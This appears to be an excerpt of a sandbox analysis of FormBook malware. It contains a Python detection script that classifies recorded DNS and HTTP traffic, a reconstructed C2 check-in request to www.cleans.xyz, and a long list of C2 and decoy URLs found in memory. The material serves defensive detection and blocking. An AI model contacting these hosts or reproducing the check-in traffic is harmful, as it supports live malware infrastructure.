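Sandbox export format.

```python
"""Added example (not part of the Joe Sandbox report): classify the recorded
DNS and HTTP activity against the extracted FormBook configuration. Events are
constructed from values in the report; the layout is this example's own."""
import json
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Trimmed copy of the extracted configuration (the full decoy list is in the report).
CONFIG_JSON = json.dumps({
    "C2 list": ["www.ehills.shop/m25s/"],
    "decoy": ["araghospitality.net", "cleans.xyz", "6874.club", "6uzh.digital"],
})

NXDOMAIN = 3  # DNS RCODE 3, the report's "Name error (3)"

# (queried name, reply code), constructed from the report's DNS lines;
# www.cleans.xyz is the one that answered and received the HTTP request.
DNS_EVENTS: List[Tuple[str, int]] = [
    ("www.ehills.shop", NXDOMAIN),
    ("www.cleans.xyz", 0),
    ("www.6874.club", NXDOMAIN),
    ("www.araghospitality.net", NXDOMAIN),
    ("api.msn.com", 0),          # explorer.exe's own traffic, not the implant's
]

# The captured request, reconstructed from the report's "HTTP traffic detected" line.
RAW_REQUEST = (
    "GET /m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ"
    "&eN9dz=nR-4vpW HTTP/1.1\r\n"
    "Host: www.cleans.xyz\r\n"
    "Connection: close\r\n\r\n"
)


def load_config(raw: str) -> Dict[str, set]:
    """Split 'host/path' C2 entries and derive the host set the implant will query."""
    cfg = json.loads(raw)
    c2_hosts, paths = set(), set()
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2_hosts.add(host.lower())
        paths.add("/" + path)
    return {
        "c2_hosts": c2_hosts,
        # In this run every decoy was queried as "www." + entry.
        "decoy_hosts": {"www." + d.lower() for d in cfg["decoy"]},
        "paths": paths,
    }


def classify_dns(name: str, rcode: int, cfg: Dict[str, set]) -> str:
    name = name.lower().rstrip(".")
    if name in cfg["c2_hosts"]:
        kind = "c2"
    elif name in cfg["decoy_hosts"]:
        kind = "decoy"
    else:
        return "unrelated"
    return f"{kind}-{'nxdomain' if rcode == NXDOMAIN else 'resolved'}"


def live_contacts(events: List[Tuple[str, int]], cfg: Dict[str, set]) -> List[str]:
    """Config hosts that actually resolved: those are the ones that receive the check-in."""
    return [n for n, rc in events if classify_dns(n, rc, cfg).endswith("-resolved")]


def parse_http(raw: str) -> Dict[str, object]:
    """Minimal request-line and header parser for a single HTTP/1.1 request."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {
        "method": method,
        "path": url.path,
        "params": parse_qs(url.query),
        "host": headers.get("host", "").lower(),
        "user_agent": headers.get("user-agent"),  # None: the report's "without a user agent"
    }


def is_checkin(req: Dict[str, object], cfg: Dict[str, set]) -> bool:
    """GET to a config host on the config path, no User-Agent, at least two opaque parameters."""
    known_host = req["host"] in (cfg["c2_hosts"] | cfg["decoy_hosts"])
    known_path = any(str(req["path"]).startswith(p) for p in cfg["paths"])
    return (req["method"] == "GET" and known_host and known_path
            and req["user_agent"] is None and len(req["params"]) >= 2)
```

The practical consequence for blocking: matching only the "C2 list" entry would have missed this run entirely, because the live contact was a decoy. Block (or alert on) the path and parameter shape across every host in the configuration, and treat a burst of NXDOMAIN answers for config domains from explorer.exe as the same incident.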
Source: explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2969473243.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.0000000009762000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.0000000009744000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2969473243.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.0000000009762000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.0000000009744000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2969473243.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.0000000009762000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.0000000009744000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2969473243.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2693828818.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2691050893.0000000009744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.0000000009762000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.0000000009744000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000F.00000003.2804871822.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2793569452.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2803535745.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2818334833.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2794596825.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2768130386.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2772643327.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4179161304.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2798970117.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3932879734.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3941148394.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2966304641.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2761273592.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://schemas.mi
Source: explorer.exe, 0000000F.00000003.2804871822.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2793569452.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2803535745.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2818334833.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2794596825.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2768130386.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2772643327.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4179161304.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2798970117.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3932879734.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3941148394.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2966304641.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2761273592.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000004.00000002.2632617242.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2634903958.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2632406238.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://schemas.micro
Source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp, String found in binary or memory: http://tempuri.org/DataSet1.xsdQdelete
Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.6874.club
Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.6874.club/m25s/
Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.6874.club/m25s/www.cleans.xyz
Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.6874.clubReferer:
Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.6uzh.digital
Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.6uzh.digital/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.6uzh.digital/m25s/www.ax-th-6011838.fyi
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.6uzh.digitalReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.76iw543gw.autos
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.76iw543gw.autos/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.76iw543gw.autos/m25s/www.uykoii.shop
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.76iw543gw.autosReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anforexuytin.cfd
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anforexuytin.cfd/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anforexuytin.cfd/m25s/www.ildcraft.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anforexuytin.cfdReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.araghospitality.net
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.araghospitality.net/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.araghospitality.net/m25s/www.ehills.shop
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.araghospitality.netReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz/m25s/www.76iw543gw.autos
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyzReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.attoomasteracademy.online
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.attoomasteracademy.online/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.attoomasteracademy.online/m25s/www.raphic-design-degree-33148.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.attoomasteracademy.onlineReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ax-th-6011838.fyi
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ax-th-6011838.fyi/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ax-th-6011838.fyi/m25s/www.wistlnc.net
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ax-th-6011838.fyiReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa/m25s/www.itodemo.click
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpaReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleans.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleans.xyz/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleans.xyz/m25s/www.ental-health-69511.bond
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleans.xyzReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shop/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shop/m25s/o
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shop/m25s/www.olnacasinotcs14.top
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shopReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dt5r.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dt5r.shop/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dt5r.shop/m25s/www.cctofi.cpa
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dt5r.shopReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop/m25s/www.anforexuytin.cfd
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop/m25s/www.cskuvq.shop
